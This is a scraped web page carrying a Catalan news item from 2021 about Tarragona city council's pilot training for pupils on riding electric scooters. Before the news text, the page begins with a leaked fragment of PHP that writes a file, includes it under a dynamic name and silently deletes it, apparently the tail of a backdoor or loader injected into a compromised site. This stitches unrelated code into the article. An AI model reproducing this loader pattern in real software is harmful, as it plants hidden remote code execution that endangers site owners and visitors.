");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> L'Ajuntament de Tarragona realitza una prova pilot de formació a escoles i instituts en temes de mobilitat personal
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

L'Ajuntament de Tarragona realitza una prova pilot de formació a escoles i instituts en temes de mobilitat personal (07/06/2021)

L’Ajuntament de Tarragona realitzará, conjuntament amb Tècniques de Conducció i Control, unes jornades formatives en la conducció de patinets elèctrics a centres educatius. El 7 de juny començarà una prova pilot a l’escola La Salle Tarragona i, el proper curs, s’estendrà la iniciativa a la resta de centres educatius de la ciutat.

Així mateix, el proper mes de juliol i –de la mà de la cooperativa de mobilitat sostenible del Camp de Tarragona Escamot- es programaran jornades formatives en diferents punts de la ciutat. “L’objectiu és formar a la ciutadania en l’ús dels patinets elèctrics i la necessitat de transformar el model de mobilitat perquè sigui més sostenible”, subratlla el conseller de Territori, Mobilitat i Sostenibilitat, Xavier Puig.

La formació als centres educatius és un eix clau de l’acció de Govern Municipal en temes de mobilitat. De fet, el conseller Puig ja va avançar al mes de març que es programarien tallers formatius a escoles i instituts dirigits a joves de 16 anys. “Tan important és formar als adolescents amb l’ús d’aquest vehicle de mobilitat personal com a la resta de ciutadans de totes les edats, perquè l’objectiu és aprendre a circular per la calçada i no per la vorera. Volem promoure un canvi d’hàbits entre els ciutadans per virar cap a un model de mobilitat més segura i sosténible”.

Font: Ajuntament de Tarragona

L'Ajuntament de Tarragona realitza una prova pilot de formació a escoles i instituts en temes de mobilitat personal

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona